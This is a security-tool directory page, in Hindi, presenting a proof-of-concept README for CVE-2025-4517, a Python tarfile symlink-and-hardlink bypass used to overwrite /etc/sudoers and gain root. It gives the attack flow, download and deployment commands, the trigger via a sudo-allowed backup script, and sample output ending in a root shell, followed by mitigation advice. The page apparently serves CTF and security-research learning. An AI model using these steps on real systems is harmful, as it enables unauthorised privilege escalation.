Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-4517-POC — CVE-2025-4517 के लिए विशेषाधिकार वृद्धि स्क्रिप्ट | Kitploit
उपकरण/GitHubGitHub/azureadtrent/cve-2025-4517-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणCTFलर्निंग और शिक्षाबाइनरी शोषण
GitHubazureadtrent/cve-2025-4517-poc

CVE-2025-4517-POC

CVE-2025-4517 के लिए विशेषाधिकार वृद्धि स्क्रिप्ट

रिपॉजिटरी देखें
926 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-4517 शोषण

नोट्स

यह शोषण और विवरण AI द्वारा लिखे गए हैं। यदि आपको कोई गलती या समस्या मिले, तो कृपया मुझे बताएं! यह शोषण परीक्षण किया गया और काम करता पाया गया। धन्यवाद!

अवलोकन

यह शोषण CVE-2025-4517 का लाभ उठाता है, जो पायथन के tarfile मॉड्यूल में एक गंभीर भेद्यता है जो सिमलिंक पथ ट्रैवर्सल और हार्डलिंक हेरफेर के संयोजन के माध्यम से मनमानी फ़ाइल लिखने की अनुमति देता है। यह पायथन 3.12 में पेश किए गए filter="data" सुरक्षा को बायपास करता है।

भेद्यता विवरण

  • CVE ID: CVE-2025-4517
  • प्रभावित संस्करण: Python 3.8.0 से 3.13.1
  • CVSS स्कोर: 9.3 (गंभीर)
  • प्रभाव: उन्नत विशेषाधिकारों के साथ मनमानी फ़ाइल लिखना

तकनीकी पृष्ठभूमि

यह भेद्यता इस बात में एक दोष का शोषण करती है कि Python का tarfile.extractall() किस प्रकार के इंटरैक्शन को संभालता है:

  1. सिमलिंक्स - निकासी निर्देशिका के बाहर पथ ट्रैवर्सल बनाने के लिए उपयोग किया जाता है
  2. हार्डलिंक्स - बच निकले सिमलिंक पथ के माध्यम से फ़ाइलों को संदर्भित करने के लिए उपयोग किया जाता है
  3. फ़िल्टर बायपास - filter="data" पैरामीटर सीधे सिमलिंक एस्केप को ब्लॉक करता है, लेकिन हार्डलिंक तकनीक इस सुरक्षा को दरकिनार कर देती है

हमला प्रवाह

root@kitploit:~
1. गहरे नेस्टेड निर्देशिकाएँ बनाएँ (पथ भ्रम)
   └─ 16 स्तर गहरे दोहराए गए 247-वर्ण वाले निर्देशिका नामों का उपयोग करता है

2. ट्रैवर्सल के लिए सिमलिंक श्रृंखला बनाएँ
   └─ ऐसे सिमलिंक बनाता है जो निर्देशिका पेड़ के माध्यम से ऊपर की ओर हल करते हैं

3. लक्ष्य निर्देशिका (/etc) के लिए सिमलिंक एस्केप करें
   └─ अंतिम सिमलिंक निकासी सीमा के बाहर इंगित करता है

4. एस्केप सिमलिंक के माध्यम से इशारा करने वाला हार्डलिंक बनाएँ
   └─ हार्डलिंक: "sudoers_link" → "escape/sudoers" → "/etc/sudoers"

5. हार्डलिंक पर सामग्री लिखें
   └─ "sudoers_link" पर लिखना वास्तव में /etc/sudoers पर लिखता है

भेद्य घटक

स्क्रिप्ट: /opt/backup_clients/restore_backup_clients.py

root@kitploit:~
# भेद्य कोड स्निपेट
with tarfile.open(backup_path, "r") as tar:
    tar.extractall(path=staging_dir, filter="data")

सुडो अनुमतियाँ:

root@kitploit:~
wacky ALL=(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *

सिस्टम विवरण

  • पायथन संस्करण: 3.12.3 (CVE-2025-4517 के लिए भेद्य)

उपयोग

पूर्वापेक्षाएँ

  • भेद्य स्क्रिप्ट के लिए sudo अनुमतियों वाला उपयोगकर्ता पहुँच
  • /opt/backup_clients/backups/ में लिखने की पहुँच
  • हमला करने वाली मशीन पर Python 3

स्थापना

root@kitploit:~
# शोषण डाउनलोड करें
wget https://raw.githubusercontent.com/AzureADTrent/CVE-2025-4517-POC/refs/heads/main/CVE-2025-4517-POC.py
# लक्ष्य सिस्टम पर ले जाएँ

बुनियादी निष्पादन

root@kitploit:~
# शोषण चलाएँ
./exploit.py

# या Python के साथ
python3 exploit.py

मैन्युअल चरण-दर-चरण

यदि आप प्रत्येक चरण को मैन्युअल रूप से चलाना पसंद करते हैं:

root@kitploit:~
# 1. शोषण tar बनाएँ
python3 exploit.py --create-only

# 2. लक्ष्य पर तैनात करें
cp /tmp/cve_2025_4517_exploit.tar /opt/backup_clients/backups/backup_9999.tar

# 3. भेद्य स्क्रिप्ट के माध्यम से निष्पादित करें
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py \
  -b backup_9999.tar \
  -r restore_exploit

# 4. sudoers संशोधन सत्यापित करें
sudo cat /etc/sudoers | grep "$(whoami)"

# 5. रूट प्राप्त करें
sudo /bin/bash

आउटपुट उदाहरण

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     CVE-2025-4517 Tarfile Exploit                         ║
║     Privilege Escalation via Symlink + Hardlink Bypass    ║
╚═══════════════════════════════════════════════════════════╝

[*] Target user: wacky
[*] Creating exploit tar for user: wacky
[*] Phase 1: Building nested directory structure...
[*] Phase 2: Creating symlink chain for path traversal...
[*] Phase 3: Creating escape symlink to /etc...
[*] Phase 4: Creating hardlink to /etc/sudoers...
[*] Phase 5: Writing sudoers entry...
[+] Exploit tar created: /tmp/cve_2025_4517_exploit.tar
[*] Deploying exploit to: /opt/backup_clients/backups/backup_9999.tar
[+] Exploit deployed successfully
[*] Triggering extraction via vulnerable script...
[+] Backup: backup_9999.tar
[+] Staging directory: /opt/backup_clients/restored_backups/restore_pwn_9999
[+] Extraction completed in /opt/backup_clients/restored_backups/restore_pwn_9999
[+] Extraction completed
[*] Verifying exploit success...
[+] SUCCESS! User 'wacky' added to sudoers
[+] Entry: wacky ALL=(ALL) NOPASSWD: ALL

============================================================
[+] EXPLOITATION SUCCESSFUL!
[+] User 'wacky' now has full sudo privileges
[+] Get root with: sudo /bin/bash
============================================================

[?] Spawn root shell now? (y/n): y
[*] Spawning root shell...
[*] Run: sudo /bin/bash

root@box:/tmp# whoami
root
root@box:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

प्रूफ ऑफ कॉन्सेप्ट फ्लो

चरण 1: प्रारंभिक पहुँच

  • उपयोगकर्ता तक पहुँच

चरण 2: विशेषाधिकार वृद्धि (यह शोषण)

  • बैकअप रिस्टोर स्क्रिप्ट पर sudo अनुमतियाँ पहचानें
  • CVE-2025-4517 के लिए भेद्य पायथन संस्करण पहचानें
  • /etc/sudoers को संशोधित करने के लिए tar शोषण तैनात करें
  • रूट पहुँच प्राप्त करें

शमन

पायथन डेवलपर्स के लिए

  1. पायथन अपग्रेड करें: Python 3.13.2+ या सुरक्षा पैच लागू करें
root@kitploit:~
   python3 --version  # संस्करण जाँचें
  1. अतिरिक्त सत्यापन: tar सामग्री पर सख्त सत्यापन लागू करें
root@kitploit:~
   # निकासी से पहले संदिग्ध सदस्यों की जाँच करें
   for member in tar.getmembers():
       if member.islnk() or member.issym():
           raise SecurityError("सिमलिंक/हार्डलिंक की अनुमति नहीं है")
  1. निकासी पथ प्रतिबंधित करें: सत्यापित करें कि सभी निकाली गई फ़ाइलें सीमा के भीतर रहें
root@kitploit:~
   import os
   for member in tar.getmembers():
       member_path = os.path.join(extract_path, member.name)
       if not member_path.startswith(os.path.abspath(extract_path)):
           raise SecurityError("पथ ट्रैवर्सल का पता चला")

सिस्टम प्रशासकों के लिए

  1. sudo पहुँच सीमित करें: रूट के रूप में चलाई जा सकने वाली स्क्रिप्ट को कम करें
root@kitploit:~
   # बैकअप स्क्रिप्ट sudo पहुँच हटाएँ या प्रतिबंधित करें
   visudo
  1. इनपुट सत्यापन: प्रोसेसिंग से पहले tar आर्काइव का सत्यापन करें
root@kitploit:~
   # निकासी से पहले tar सामग्री जाँचें
   tar -tzf archive.tar | grep -E '\.\./|^/'
  1. फ़ाइल अखंडता निगरानी: /etc/sudoers जैसी महत्वपूर्ण फ़ाइलों की निगरानी करें
root@kitploit:~
   # AIDE या समान IDS सेटअप करें
   aide --check
  1. AppArmor/SELinux: अनिवार्य पहुँच नियंत्रण लागू करें

संदर्भ

CVE जानकारी

  • CVE-2025-4517 - NVD
  • CVE-2025-4138 - संबंधित भेद्यता
  • Python सुरक्षा सलाह

अनुसंधान और लेख

  • Linux सुरक्षा सलाह
  • Google सुरक्षा अनुसंधान - GHSA-hgqp-3mmf-7h8f

सार्वजनिक PoCs

  • DesertDemons CVE-2025-4138-4517-POC
  • StealthByte CVE-2025-4517-poc
  • AnimePrincess420 PoC

कानूनी अस्वीकरण

यह शोषण केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है और इसका उपयोग निम्नलिखित में करने का इरादा है:

  • अधिकृत प्रवेश परीक्षण अभियान
  • HackTheBox जैसी Capture The Flag (CTF) प्रतियोगिताएँ
  • नियंत्रित वातावरण में सुरक्षा अनुसंधान
  • भेद्यता प्रकटीकरण और पैच विकास

लेखक इस कोड के दुरुपयोग के लिए कोई दायित्व नहीं मानते हैं।

मूल अनुसंधान: कई सुरक्षा शोधकर्ता (संदर्भ देखें)

लाइसेंस

MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें


अंतिम अद्यतन: मार्च 2026

टूल डाउनलोड करें